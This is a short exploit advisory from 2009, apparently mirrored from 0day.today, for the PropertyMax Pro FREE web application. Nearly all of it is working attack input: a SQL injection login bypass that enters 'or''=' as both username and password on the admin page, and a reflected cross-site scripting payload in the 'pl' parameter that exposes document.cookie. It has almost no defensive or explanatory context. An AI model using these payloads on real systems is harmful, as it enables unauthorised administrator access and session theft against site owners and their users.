id: 5297
date: 06/01/2009
title: PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities
author: SirGod
cves: 

==============================================================
PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities
==============================================================


########################################################################
[+] PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
#########################################################################

[+] SQL Injection ( Auth Bypass) 

Conditions :  magic_quotes_gpc = off

Go to :

   http://127.0.0.1/path/admin

Login as : 

    Username : 'or''='
    Password  : 'or''='

[+] Cross-Site Scripting

     http://127.0.0.1/path/?op=mi&id=2&pl="><script>alert(document.cookie)</script>

#########################################################################



#  0day.today [2023-03-26]  #